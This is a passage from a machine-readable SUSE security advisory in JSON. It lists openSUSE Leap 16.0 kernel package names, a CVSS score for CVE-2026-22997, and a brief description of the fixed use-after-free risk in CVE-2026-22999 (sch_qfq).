"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
